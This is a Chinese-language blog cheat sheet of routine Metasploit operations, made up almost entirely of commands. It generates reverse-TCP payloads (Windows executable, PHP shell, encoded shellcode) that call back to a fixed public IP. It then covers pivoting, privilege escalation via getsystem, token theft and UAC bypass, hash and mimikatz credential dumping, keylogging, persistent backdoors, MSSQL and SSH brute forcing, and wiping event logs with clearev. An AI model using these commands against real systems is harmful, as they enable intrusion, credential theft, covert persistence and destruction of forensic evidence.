[2019-10-0x01] MSF的一些常規(guī)操作

MSF的一些常規(guī)操作

一、 Payload 的幾種常用生成

1.1 生成windows下的反彈木馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe
# -p <payload> -f <format> -o <path> = >

1.2 監(jiān)聽

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
# 阿里云云服務(wù)器這里是內(nèi)網(wǎng)ip
set LHOST 172.17.150.246
set LPORT 8888
exploit -j

1.3 php

msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php
use exploit/multi/handler
set PAYLOAD php/meterpreter_reverse_tcp
set LHOST 172.17.150.246
set LPORT 8888
exploit -j

1.4 shellcode

# -e 使用編碼 -i 編碼次數(shù)
msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py

二、內(nèi)網(wǎng)代理

2.1 首先需要鏈接 sessions ,在此基礎(chǔ)上添加路由

meterpreter > run get_local_subnets //獲取網(wǎng)段
meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
meterpreter > run autoroute -p //查看路由
meterpreter > run autoroute -d -s 172.2.175.0 //刪除網(wǎng)段
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探測該網(wǎng)段下的存活主機(jī)。
meterpreter > background //后臺(tái)sessions

三、提權(quán)

3.1 getsystem

meterpreter > getsystem //直getsystem提權(quán),最常用簡單的辦法

3.2 使用 exp 提權(quán)

meterpreter > background //先后臺(tái)運(yùn)行會(huì)話
[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //設(shè)置要使用的會(huì)話
msf post(ms10_073_kbdlayout) > exploit
注意:如果創(chuàng)建了一個(gè)system進(jìn)程,就可以立馬sessions 1進(jìn)入會(huì)話,然后ps查看進(jìn)程,使用migrate pid注入到進(jìn)程。
或者直接:
meterpreter > run post/windows/escalate/ms10_073_kbdlayout

3.3 盜取令牌

meterpreter > use incognito //進(jìn)入這個(gè)模塊
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看,兩個(gè)斜杠

[注]:只有具有"模仿安全令牌權(quán)限"的賬戶才能去模仿別人的令牌,一般大多數(shù)的服務(wù)型賬戶(IIS、MSSQL等)有這個(gè)權(quán)限,大多數(shù)用戶級(jí)的賬戶沒有這個(gè)權(quán)限。一般從web拿到的webshell都是IIS服務(wù)器權(quán)限,是具有這個(gè)模仿權(quán)限的,建好的賬戶沒有這個(gè)權(quán)限。使用菜刀(IIS服務(wù)器權(quán)限)反彈meterpreter是服務(wù)型權(quán)限。

3.4 Bypassuac

msf > use exploit/windows/local/bypassuac //32位與64位一樣,其他幾個(gè)模塊也一樣
msf > show options
msf > set session 4
msf > run //成功后會(huì)返回一個(gè)新的session,進(jìn)入新會(huì)話,發(fā)現(xiàn)權(quán)限沒變,使用getsystem即可完成提權(quán)

3.5 Hash

meterpreter > run post/windows/gather/smart_hashdump //讀取hash這種做法最智能,效果最好。

四、建立持久后門

4.1 服務(wù)啟動(dòng)后門

meterpreter > run metsvc -A //再開起一個(gè)終端,進(jìn)入msfconsole
msf > use exploit/multi/handler //新終端中監(jiān)聽
msf > set payload windows/metsvc_bind_tcp
msf > set LPORT 31337
msf > set RHOST 192.168.0.128
msf > run //獲取到的會(huì)話是system權(quán)限

4.2 啟動(dòng)項(xiàng)后門

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105

# -X 系統(tǒng)開機(jī)自啟,-i 10 10秒重連一次,-p 監(jiān)聽端口,-r 監(jiān)聽機(jī)。直接監(jiān)聽就好了,他自己會(huì)鏈接回來。
[注意]:移除 persistence 后門的辦法是刪除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注冊表鍵和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。
[缺點(diǎn)]:容易被殺毒軟件殺 。

這兩個(gè)后門有個(gè)弊端,在進(jìn)程中都會(huì)存在服務(wù)名稱為meterpreter的進(jìn)程。

五、漏洞掃描

5.1 對端口掃描

use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.2.1-255
set ports 21,22,25,443,445,1433,3306
set threads 20
exploit

5.2 mssql開發(fā)利用

# 1.對各個(gè)ip是否有mssql服務(wù)的探測
use scanner/mssql/mssql_ping //測試MSSQL的存在和信息
show options
set rhosts 192.168.2.1-255
set threads 30
exploit
# 2.對掃描到的ip進(jìn)行爆破
use scanner/mssql/mssql_login //具體配置show options。
# 3.sa權(quán)限對其利用
use admin/mssql/mssql_exec
set rhost 192.168.2.10
set password sa
set CMD cmd.exe /c echo hello
exploit

5.3 mysql開放利用

5.4 爆破ssh模塊

use auxiliary/scanner/ssh/ssh_login
set rhosts 7.7.7.20
set username root
set pass_file /root/pass.txt //加載字典,可以收集密碼做字典
set threads 50
run

5.5 通過 nmap 掃描基本漏洞

msf > nmap –script=vuln 受害靶機(jī)ip地址
msf > nmap –script=mysql-info 192.168.0.4 //掃描mysql數(shù)據(jù)庫信息 版本 等..

六、清除記錄

msf > clearev //刪除目標(biāo)機(jī)上的應(yīng)用程序、系統(tǒng)和安全日志。

七、一些常用命令

# 查看系統(tǒng)命令
sysinfo

# 截圖
screenshot

# 查看是否是虛擬機(jī)
run checkvm

# 查看運(yùn)行木馬的用戶
getuid

# 注入到進(jìn)程 成功會(huì)提示successfully
migrate pid

# 加載mimikatz模塊
meterpreter > load mimikatz
## 需要system權(quán)限
meterpreter > wdigest 

# 獲取鍵盤記錄
meterpreter> run post/windows/capture/keylog_recorder
#運(yùn)行鍵盤記錄模塊,他自己創(chuàng)建本文。
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容